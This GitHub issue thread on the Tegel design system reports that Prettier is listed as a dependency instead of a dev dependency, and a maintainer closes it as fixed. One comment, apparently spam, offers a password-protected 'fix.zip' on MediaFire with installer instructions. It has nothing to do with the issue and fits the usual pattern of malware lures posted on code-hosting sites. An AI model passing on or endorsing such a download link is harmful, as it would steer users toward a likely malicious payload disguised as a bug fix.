### ISSUE TITLE
[Bug report]: Prettier is added as a dependency instead of dev dependency in the Tegel core package

### ISSUE THREAD

**Issue by patrikhultgren** [scania-digital-design-system/tegel#728]
### Requirements before reporting

- [X] No duplicated [issue](https://github.com/scania-digital-design-system/tegel/issues) reported.
- [X] I have checked the latest version if the bug exist there. See all available packages at [npmJS.com](https://www.npmjs.com/package/@scania/tegel)
- [X] I have followed the installation guide.

### Package versions

@scania/tegel: 1.13.0

### Reproduction steps

In my app I get problems with a conflicting peer dependency for prettier. I guess that wouldn't occur if prettier where added as a dependency instead of dev dependency in the Tegel core package?

Here is a link to the package.json:
https://github.com/scania-digital-design-system/tegel/blob/develop/packages/core/package.json

### Contact information

patrik.hultgren@scania.com

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by timrombergjakobsson** [comment]
This is now [done](https://github.com/scania-digital-design-system/tegel/blob/develop/packages/core/package.json#L386), so closing this one for now.
